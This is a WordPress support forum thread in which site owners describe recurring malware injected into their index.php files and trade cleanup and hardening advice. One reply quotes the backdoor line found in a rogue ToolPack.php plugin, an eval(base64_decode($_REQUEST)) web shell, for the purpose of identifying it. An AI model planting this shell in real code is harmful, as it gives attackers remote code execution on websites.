Title: malware attack Last modified: August 20, 2016 --- # malware attack * [webtechdev](https://wordpress.org/support/users/webtechdev/) * (@webtechdev) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/) * Below Malware script attacked my sites . i removed it more that 15 times but it is coming again and again . Changing the ftp passwords in 2 hour once but no use . help me to remove this script and stop its routine attack . * _[Code moderated. Don’t post hack code here.]_ Viewing 9 replies - 1 through 9 (of 9 total) * [rgat](https://wordpress.org/support/users/rgat/) * (@rgat) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579502) * Me Too! Ours looks the same man! Help us! >_< * _[Code moderated. Don’t post hack code here.]_ * [rgat](https://wordpress.org/support/users/rgat/) * (@rgat) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579503) * Nothing seems to be infected while checking for rootkits, is this new? * Used chkrootkit-0.49 * Thread Starter [webtechdev](https://wordpress.org/support/users/webtechdev/) * (@webtechdev) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579521) * [@rgat](https://wordpress.org/support/users/rgat/) basically my each and every index.php file na matter which directory it is locatd code auto past in to top of index file . i set the permission to recommended 755 dir 644file not it stop pasting the code but stiil em worried about what is happening !! anyone help us. * [MickeyRoush](https://wordpress.org/support/users/mickeyroush/) * (@mickeyroush) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579527) * There may be no easy solution. I’ve combined as many links into one post so that you won’t have to search the entire web indefinitely. Hopefully they will help you. * Check your site(s) here: 1. [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 2. [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) 3. [http://www.virustotal.com/](http://www.virustotal.com/) 4. [http://www.phishtank.com/](http://www.phishtank.com/) 5. [http://www.browserdefender.com/](http://www.browserdefender.com/) 6. [http://ismyblogworking.com/](http://ismyblogworking.com/) 7. Google Safe Browsing (to access a site’s google info, add their domain to the end of this): [http://www.google.com/safebrowsing/diagnostic?site=](http://www.google.com/safebrowsing/diagnostic?site=) example: [http://www.google.com/safebrowsing/diagnostic?site=example.com](http://www.google.com/safebrowsing/diagnostic?site=example.com) * Backup everything and put that backup somewhere safe.This is in case you have problems later on. Even though you could be backing up infected files, it is more important to have a backup up of your work, for if you make a mistake cleaning your site, you will still have the backup(s). 1. [http://codex.wordpress.org/WordPress_Backups](http://codex.wordpress.org/WordPress_Backups) 2. [http://codex.wordpress.org/Backing_Up_Your_Database](http://codex.wordpress.org/Backing_Up_Your_Database) 3. [http://codex.wordpress.org/Restoring_Your_Database_From_Backup](http://codex.wordpress.org/Restoring_Your_Database_From_Backup) * Then read these: 1. [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked) 2. [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779) 3. [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) 4. [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/) * If you have indications of possible timthumb hacking, please read these: 1. [http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html](http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html) 2. [http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/](http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/) 3. [http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/](http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/) 4. [http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/](http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/) * Once your site is clean, then read this: 1. [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress) 2. [http://codex.wordpress.org/htaccess_for_subdirectories](http://codex.wordpress.org/htaccess_for_subdirectories) * Thread Starter [webtechdev](https://wordpress.org/support/users/webtechdev/) * (@webtechdev) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579541) * [@mickeyroush](https://wordpress.org/support/users/mickeyroush/) i checked most of the links. but now i installed a fresh copy for test what is happening. after uploading what i have seen is hacking code is there on top of the site. * don’t no what is happening. * [gal_op](https://wordpress.org/support/users/gal_op/) * (@gal_op) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579543) * I have the same issue, all my index.php are keep on being injected with the malicious code. * I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code: $_REQUEST[ e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit; * I have removed the folder and now i am waiting to see if the malicious code is back. * I have found out that this is could be the backdoor: [http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html](http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html) * Will update you soon * [rgat](https://wordpress.org/support/users/rgat/) * (@rgat) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579549) * Thanks a lot for all the replies, I’ll try doing the suggestions you replied here. * Kindest Regards, * rgat * [rgat](https://wordpress.org/support/users/rgat/) * (@rgat) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579613) * Hi All, * Just reporting that it was timthumb/blackhole exploit and I do not know anymore how to fix it. In the end my boss hired a security expert to fix this. * But it looks like they are also having difficulties. Do you think re-installing everything to a different server will fix this? * Best Regards, * Randy A. * Thread Starter [webtechdev](https://wordpress.org/support/users/webtechdev/) * (@webtechdev) * [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579614) * [@rgat](https://wordpress.org/support/users/rgat/) * thanks for updating more regarding topic. secondly i heard about tool pack plugin which is one line plugin and causing some other people site as well and they mentioned this. After removing this plugin everything is working perfectly and i upgrade 7 blogs as well which are out-dated. * simple tips * upgrade blog + plugins apply recommend file permission -install file monitoring plugin to keep eye on file and -install firewall plugin * thanks Viewing 9 replies - 1 through 9 (of 9 total) The topic ‘malware attack’ is closed to new replies. ## Tags * [hacking](https://wordpress.org/support/topic-tag/hacking/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 9 replies * 4 participants * Last reply from: [webtechdev](https://wordpress.org/support/users/webtechdev/) * Last activity: [14 years, 3 months ago](https://wordpress.org/support/topic/malware-attack-1/#post-2579614) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics